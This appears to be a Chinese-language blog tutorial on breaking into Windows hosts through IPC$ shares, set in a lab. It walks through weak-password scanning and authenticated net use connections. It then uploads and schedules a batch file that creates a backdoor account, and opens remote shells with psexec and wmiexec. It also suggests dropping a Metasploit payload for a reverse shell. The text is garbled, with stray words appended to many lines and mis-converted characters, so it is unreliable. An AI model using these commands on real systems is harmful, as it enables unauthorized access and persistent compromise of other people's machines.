IPC$入侵大全

0x01  ipc$的定義

IPC$(Internet Process Connection)是共享"命名管道"的資源(你們都是這麼說的),它是爲了讓進程間通訊而開放的命名管道,能夠經過驗證用戶名和密碼得到相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。利用IPC$,鏈接者甚至能夠與目標主機創建一個空的鏈接而無需用戶名與密碼(固然,對方機器必須開了ipc$共享,不然你是鏈接不上的),而利用這個空的鏈接,鏈接者還能夠獲得目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。ios

0x02  ipc$與空鏈接,139,445端口,默認共享的關係

ipc$與空鏈接:

不須要用戶名與密碼的ipc$鏈接即爲空鏈接,一旦你以某個用戶或管理員的身份登錄(即以特定的用戶名和密碼進行ipc$鏈接),天然就不能叫作空鏈接了.shell

許多人可能要問了,既然能夠空鏈接,那我之後就空鏈接好了,爲何還要費九牛二虎之力去掃描弱口令,呵呵,緣由前面提到過,當你以空鏈接登錄時,你沒有任何權限(很鬱悶吧),而你以用戶或管理員的身份登錄時,你就會有相應的權限(有權限誰不想呀,因此仍是老老實實掃吧,不要偷懶喲).windows

ipc$與139,445端口:

ipc$鏈接能夠實現遠程登錄及對默認共享的訪問;而139端口的開啓表示netbios協議的應用,咱們能夠經過139,445(win2000)端口實現對共享文件/打印機的訪問,所以通常來說,ipc$鏈接是須要139或445端口來支持的.網絡

ipc$與默認共享

默認共享是爲了方便管理員遠程管理而默認開啓的共享(你固然能夠關閉它),即全部的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),咱們經過ipc$鏈接能夠實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享)工具

0x03  ipc$入侵實戰

 

1.實驗環境:操作系統

.攻擊機:win7x64   IP:192.168.1.101server

靶機:  win2003   ip:192.168.1.108blog

 

2.經過掃描器掃描IPC$弱口令鏈接:進程

這裏推薦你們用ntscan或者溯雪和x-scan,porscan等掃描器ip

 

3.經過net  use  創建一個非空鏈接:

鏈接域backlion的ipc$:

net  use  \\192.168.1.108\c$  「12345@12345qw」 /user:backlion\administrator

net use  \\192.168.1.108\c$   123456   /user:administrator  //創建的非空鏈接

或者

net  use  \\192.168.1.108\c$  " 123456"  /user:administrator  //創建的非空鏈接

net  use \\192.168.1.108\c$   ""     /user:administrator  //空鏈接,無密碼

 

4.這裏準備上傳一個創建bk帳號的批處理:

d:\user.bat  文件內容爲:net user  bk   bk123   /add

 

 

注:這裏也能夠上傳MSF下生成的exe,上傳到靶機上執行,而後反彈出shell,更能很好地操做。

 

5.經過copy命令上傳本地攻擊機的批處理文件到目標靶機的c$上,也就是靶機的c:\

copy    user.bat     \\192.168.1.108\c$

 

注意:文件下載

copy  \\192.168.1.108\c$\user.bat  user.bat

6.查看目標靶機的時間:

net time  \\192.168.1.108

 

7.經過at命令在特定時間執行批處理文件:

at  \\192.168.1.108  12:13:00   c:\user.bat

 

6.在目標靶機上發現帳號已成功添加執行:

 

8.其餘命令:

將目標共享創建一個映射Z盤:

net use z: \\192.168.1.108\c$

 

查看已創建的會話:

net use 

 

刪除會話鏈接:

 

9.經過psexec工具進行會話鏈接執行

psexec.exe  \\192.168.1.108   cmd  //前提是須要創建一個空鏈接或者非空鏈接

 

psexec.exe  \\192.168.1.108   cmd  -u  administrator   -p  123456  //不須要創建空鏈接

 

而後就能夠在目標靶機上任意執行命令:

 

10.經過wmiexec.vbs進行遠程會話執行:

csript.exe  wmiexec.vbs   /shell   192.168.1.108   administrator   123456

 

而後執行一些系統命令:

 

 

0x04  ipc$鏈接失敗的緣由

如下5個緣由是比較常見的: 1)你的系統不是NT或以上操做系統; 2)對方沒有打開ipc$默認共享 3)對方未開啓139或445端口(惑被防火牆屏蔽) 4)你的命令輸入有誤(好比缺乏了空格等) 5)用戶名或密碼錯誤(空鏈接固然無所謂了) 另外,你也能夠根據返回的錯誤號分析緣由:  錯誤號5,拒絕訪問 : 極可能你使用的用戶不是管理員權限的,先提高權限;  錯誤號51,Windows 沒法找到網絡路徑 : 網絡有問題;  錯誤號53,找不到網絡路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啓動;目標有防火牆(端口過濾);  錯誤號67,找不到網絡名 : 你的lanmanworkstation服務未啓動;目標刪除了ipc$;  錯誤號1219,提供的憑據與已存在的憑據集衝突 : 你已經和對方創建了一個ipc$,請刪除再連。  錯誤號1326,未知的用戶名或錯誤密碼 : 緣由很明顯了;  錯誤號1792,試圖登陸,可是網絡登陸服務沒有啓動 : 目標NetLogon服務未啓動。(鏈接域控會出現此狀況)  錯誤號2242,此用戶的密碼已通過期 : 目標有賬號策略,強制按期要求更改密碼。  關於ipc$連不上的問題比較複雜,除了以上的緣由,還會有其餘一些不肯定因素,在此本人沒法詳細而肯定的說明,就靠你們本身體會和試驗

相關文章
相關標籤/搜索